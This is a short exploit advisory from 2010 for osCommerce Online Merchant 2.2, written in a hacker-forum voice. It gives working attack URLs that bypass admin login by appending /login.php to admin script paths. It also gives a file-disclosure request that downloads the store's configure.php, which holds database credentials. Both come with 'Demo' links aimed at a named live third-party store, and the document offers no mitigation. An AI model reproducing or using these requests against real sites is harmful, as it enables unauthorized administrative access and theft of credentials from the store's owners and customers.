--------------------------------------------
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
--------------------------------------------

Author      : Flyff666
Date        : May, 30, 2010
Location    : Tangerang, Indonesia
Time Zone   : GMT +7:00
Software    : OsCommerce Online Merchant v2.2
Tested    on  : All OS
--------------------------------------------
Email  : Dream_Theatre@rocketmail.com
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
     WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
     Spykit, BobyHikaru, Fribo. all member.
Site   : Http://www.Devilzc0de.org/forum/
Forum  : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

    or

http://[site]/admin/file_manager.php/login.php                                                                

Demo : 

http://thethirdeye.co.in/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above


# File Disclosure :

in    : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Demo    : http://thethirdeye.co.in/store/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php


End.